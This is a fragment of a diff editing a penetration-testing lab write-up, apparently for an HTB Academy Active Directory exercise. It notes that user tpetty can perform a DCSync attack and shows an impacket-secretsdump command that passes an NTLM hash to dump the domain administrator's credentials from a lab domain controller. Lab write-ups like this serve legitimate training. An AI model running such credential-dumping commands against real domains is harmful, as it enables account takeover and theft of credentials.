krovs/oscp-writeups/docs/HTB Academy/ad1.md

          * Domain   : INLANEFREIGHT
 ```

-User tpetty can DCSync the domain
+User `tpetty` can perform a DCSync attack on the domain.

 ![](assets/Pasted%20image%2020250502164144.png)

-Using secretsdump
+Use `secretsdump` to extract credentials.

 ```shell
 $ impacket-secretsdump inlanefreight.local/tpetty@172.16.6.3 -hashes :fd37b6fec5704cadabb319cebf9e3a3a -dc-ip 172.16.6.3 -just-dc-user administrator